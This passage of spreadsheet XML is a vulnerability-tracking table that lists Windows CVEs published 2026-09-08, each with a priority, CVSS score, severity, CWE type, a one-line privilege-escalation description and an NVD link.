      </c>
      <c r="E1368" s="5" t="inlineStr"/>
      <c r="F1368" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1368" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1368" s="5" t="inlineStr"/>
      <c r="I1368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1368" s="5" t="inlineStr"/>
      <c r="K1368" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1368" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="C1369" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1369" s="5" t="inlineStr"/>
      <c r="F1369" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1369" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1369" s="5" t="inlineStr"/>
      <c r="I1369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1369" s="5" t="inlineStr"/>
      <c r="K1369" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1369" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="C1370" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1370" s="5" t="inlineStr"/>
      <c r="F1370" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1370" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1370" s="5" t="inlineStr"/>
      <c r="I1370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1370" s="5" t="inlineStr"/>
      <c r="K1370" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1370" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="C1371" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1371" s="5" t="inlineStr"/>
      <c r="F1371" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1371" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1371" s="5" t="inlineStr"/>
      <c r="I1371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1371" s="5" t="inlineStr"/>
      <c r="K1371" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1371" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="C1372" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1372" s="5" t="inlineStr"/>
      <c r="F1372" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1372" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1372" s="5" t="inlineStr"/>
      <c r="I1372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1372" s="5" t="inlineStr"/>
      <c r="K1372" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1372" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="C1373" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1373" s="5" t="inlineStr"/>
      <c r="F1373" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1373" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1373" s="5" t="inlineStr"/>
      <c r="I1373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1373" s="5" t="inlineStr"/>
      <c r="K1373" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L1373" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="C1374" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1374" s="5" t="inlineStr"/>
      <c r="F1374" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1374" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1374" s="5" t="inlineStr"/>
      <c r="I1374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1374" s="5" t="inlineStr"/>
      <c r="K1374" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1374" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70578</t>
        </is>
      </c>
      <c r="C1375" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1375" s="5" t="inlineStr"/>
      <c r="F1375" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1375" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1375" s="5" t="inlineStr"/>
      <c r="I1375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1375" s="5" t="inlineStr"/>
      <c r="K1375" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1375" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t>
        </is>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="C1376" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1376" s="5" t="inlineStr"/>
      <c r="F1376" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1376" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1376" s="5" t="inlineStr"/>
      <c r="I1376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1376" s="5" t="inlineStr"/>
      <c r="K1376" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1376" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="C1377" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1377" s="5" t="inlineStr"/>
      <c r="F1377" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1377" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1377" s="5" t="inlineStr"/>
      <c r="I1377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1377" s="5" t="inlineStr"/>
      <c r="K1377" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1377" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="C1378" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1378" s="5" t="inlineStr"/>
      <c r="F1378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1378" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1378" s="5" t="inlineStr"/>
      <c r="I1378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1378" s="5" t="inlineStr"/>
      <c r="K1378" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1378" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="C1379" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1379" s="5" t="inlineStr"/>
      <c r="F1379" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1379" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1379" s="5" t="inlineStr"/>
      <c r="I1379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1379" s="5" t="inlineStr"/>
      <c r="K1379" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1379" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="C1380" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1380" s="5" t="inlineStr"/>
      <c r="F1380" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1380" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1380" s="5" t="inlineStr"/>
      <c r="I1380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1380" s="5" t="inlineStr"/>
      <c r="K1380" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1380" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71351</t>
        </is>
      </c>
      <c r="C1381" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1381" s="5" t="inlineStr"/>
      <c r="F1381" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1381" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1381" s="5" t="inlineStr"/>
      <c r="I1381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1381" s="5" t="inlineStr"/>
      <c r="K1381" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1381" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t>
        </is>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71353</t>
        </is>
      </c>
      <c r="C1382" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1382" s="5" t="inlineStr"/>
      <c r="F1382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1382" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1382" s="5" t="inlineStr"/>
      <c r="I1382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1382" s="5" t="inlineStr"/>
      <c r="K1382" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1382" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t>
        </is>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72926</t>
        </is>
      </c>
      <c r="C1383" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1383" s="5" t="inlineStr"/>
      <c r="F1383" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1383" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1383" s="5" t="inlineStr"/>
      <c r="I1383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1383" s="5" t="inlineStr"/>
      <c r="K1383" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1383" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t>
        </is>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72930</t>
        </is>
      </c>
      <c r="C1384" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1384" s="5" t="inlineStr"/>
      <c r="F1384" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1384" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1384" s="5" t="inlineStr"/>
      <c r="I1384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1384" s="5" t="inlineStr"/>
      <c r="K1384" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1384" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t>
        </is>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72952</t>
        </is>
      </c>
      <c r="C1385" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1385" s="5" t="inlineStr"/>
      <c r="F1385" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1385" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1385" s="5" t="inlineStr"/>
      <c r="I1385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1385" s="5" t="inlineStr"/>
      <c r="K1385" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1385" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t>
        </is>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="C1386" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1386" s="5" t="inlineStr"/>
      <c r="F1386" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1386" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1386" s="5" t="inlineStr"/>
      <c r="I1386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1386" s="5" t="inlineStr"/>
      <c r="K1386" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1386" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="C1387" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1387" s="5" t="inlineStr"/>
      <c r="F1387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1387" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1387" s="5" t="inlineStr"/>
      <c r="I1387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1387" s="5" t="inlineStr"/>
      <c r="K1387" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1387" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="C1388" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1388" s="5" t="inlineStr"/>
      <c r="F1388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1388" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1388" s="5" t="inlineStr"/>
      <c r="I1388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1388" s="5" t="inlineStr"/>
      <c r="K1388" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1388" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="C1389" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1389" s="5" t="inlineStr"/>
      <c r="F1389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1389" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1389" s="5" t="inlineStr"/>
      <c r="I1389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1389" s="5" t="inlineStr"/>
      <c r="K1389" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1389" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="C1390" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1390" s="5" t="inlineStr"/>
      <c r="F1390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1390" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1390" s="5" t="inlineStr"/>
      <c r="I1390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1390" s="5" t="inlineStr"/>
      <c r="K1390" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1390" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="C1391" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1391" s="5" t="inlineStr"/>
      <c r="F1391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1391" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1391" s="5" t="inlineStr"/>
      <c r="I1391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1391" s="5" t="inlineStr"/>
      <c r="K1391" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1391" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="C1392" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1392" s="5" t="inlineStr"/>
      <c r="F1392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1392" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1392" s="5" t="inlineStr"/>
      <c r="I1392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1392" s="5" t="inlineStr"/>
      <c r="K1392" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1392" s="5" t="inlineStr">
        <is>
